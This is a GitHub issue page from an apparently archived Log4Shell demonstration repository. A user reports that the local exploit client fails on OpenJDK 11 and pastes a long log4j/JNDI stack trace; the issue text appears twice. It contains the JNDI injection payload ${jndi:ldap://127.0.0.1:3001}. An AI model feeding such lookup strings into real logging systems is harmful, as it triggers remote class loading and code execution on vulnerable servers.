You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
This repository has been archived by the owner on Jun 12, 2022. It is now read-only.
Thanks a ton for your great local exploit! I'm just having a problem on Ubuntu with OpenJDK 11. When I tun the log4j-client-1.0-SNAPSHOT.jar file and pass in the string ${jndi:ldap://127.0.0.1:3001}, I get the following error:
Mon Dec 13 2021 08:50:12 GMT-0800 (Pacific Standard Time) Request was made: /Main.class
2021-12-13 08:50:12,761 main WARN Error looking up JNDI resource [ldap://127.0.0.1:3001/]. javax.naming.NamingException: problem generating object using object factory [Root exception is java.lang.ClassCastException: class Main cannot be cast to class javax.naming.spi.ObjectFactory (Main is in unnamed module of loader java.net.FactoryURLClassLoader @2f217633; javax.naming.spi.ObjectFactory is in module java.naming of loader 'bootstrap')]; remaining name ''
at java.naming/com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1121)
at java.naming/com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(ComponentContext.java:542)
at java.naming/com.sun.jndi.toolkit.ctx.PartialCompositeContext.lookup(PartialCompositeContext.java:177)
at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:207)
at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409)
at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172)
at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56)
at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:198)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1060)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:982)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:878)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:433)
at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:132)
at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38)
at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:341)
at org.apache.logging.log4j.core.layout.PatternLayout.toText(PatternLayout.java:240)
at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:225)
at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:59)
at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.directEncodeEvent(AbstractOutputStreamAppender.java:197)
at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.tryAppend(AbstractOutputStreamAppender.java:190)
at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:181)
at org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderControl.java:156)
at org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderControl.java:129)
at org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion(AppenderControl.java:120)
at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:84)
at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:543)
at org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.java:502)
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:485)
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:460)
at org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(AwaitCompletionReliabilityStrategy.java:82)
at org.apache.logging.log4j.core.Logger.log(Logger.java:162)
at org.apache.logging.log4j.spi.AbstractLogger.tryLogMessage(AbstractLogger.java:2190)
at org.apache.logging.log4j.spi.AbstractLogger.logMessageTrackRecursion(AbstractLogger.java:2144)
at org.apache.logging.log4j.spi.AbstractLogger.logMessageSafely(AbstractLogger.java:2127)
at org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:2003)
at org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:1975)
at org.apache.logging.log4j.spi.AbstractLogger.trace(AbstractLogger.java:2330)
at win.roto.client.Main.main(Main.java:33)
Caused by: java.lang.ClassCastException: class Main cannot be cast to class javax.naming.spi.ObjectFactory (Main is in unnamed module of loader java.net.FactoryURLClassLoader @2f217633; javax.naming.spi.ObjectFactory is in module java.naming of loader 'bootstrap')
at java.naming/javax.naming.spi.NamingManager.getObjectFactoryFromReference(NamingManager.java:179)
at java.naming/javax.naming.spi.DirectoryManager.getObjectInstance(DirectoryManager.java:188)
at java.naming/com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1114)
... 38 more
I can see that it's certainly trying to trigger the vulnerability, but fails.
The text was updated successfully, but these errors were encountered:
Thanks a ton for your great local exploit! I'm just having a problem on Ubuntu with OpenJDK 11. When I tun the log4j-client-1.0-SNAPSHOT.jar file and pass in the string ${jndi:ldap://127.0.0.1:3001}, I get the following error:
Mon Dec 13 2021 08:50:12 GMT-0800 (Pacific Standard Time) Request was made: /Main.class
2021-12-13 08:50:12,761 main WARN Error looking up JNDI resource [ldap://127.0.0.1:3001/]. javax.naming.NamingException: problem generating object using object factory [Root exception is java.lang.ClassCastException: class Main cannot be cast to class javax.naming.spi.ObjectFactory (Main is in unnamed module of loader java.net.FactoryURLClassLoader @2f217633; javax.naming.spi.ObjectFactory is in module java.naming of loader 'bootstrap')]; remaining name ''
at java.naming/com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1121)
at java.naming/com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(ComponentContext.java:542)
at java.naming/com.sun.jndi.toolkit.ctx.PartialCompositeContext.lookup(PartialCompositeContext.java:177)
at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:207)
at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409)
at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172)
at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56)
at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:198)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1060)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:982)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:878)
at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:433)
at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:132)
at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38)
at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:341)
at org.apache.logging.log4j.core.layout.PatternLayout.toText(PatternLayout.java:240)
at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:225)
at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:59)
at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.directEncodeEvent(AbstractOutputStreamAppender.java:197)
at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.tryAppend(AbstractOutputStreamAppender.java:190)
at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:181)
at org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderControl.java:156)
at org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderControl.java:129)
at org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion(AppenderControl.java:120)
at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:84)
at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:543)
at org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.java:502)
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:485)
at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:460)
at org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(AwaitCompletionReliabilityStrategy.java:82)
at org.apache.logging.log4j.core.Logger.log(Logger.java:162)
at org.apache.logging.log4j.spi.AbstractLogger.tryLogMessage(AbstractLogger.java:2190)
at org.apache.logging.log4j.spi.AbstractLogger.logMessageTrackRecursion(AbstractLogger.java:2144)
at org.apache.logging.log4j.spi.AbstractLogger.logMessageSafely(AbstractLogger.java:2127)
at org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:2003)
at org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:1975)
at org.apache.logging.log4j.spi.AbstractLogger.trace(AbstractLogger.java:2330)
at win.roto.client.Main.main(Main.java:33)
Caused by: java.lang.ClassCastException: class Main cannot be cast to class javax.naming.spi.ObjectFactory (Main is in unnamed module of loader java.net.FactoryURLClassLoader @2f217633; javax.naming.spi.ObjectFactory is in module java.naming of loader 'bootstrap')
at java.naming/javax.naming.spi.NamingManager.getObjectFactoryFromReference(NamingManager.java:179)
at java.naming/javax.naming.spi.DirectoryManager.getObjectInstance(DirectoryManager.java:188)
at java.naming/com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1114)
... 38 more
I can see that it's certainly trying to trigger the vulnerability, but fails.
The text was updated successfully, but these errors were encountered: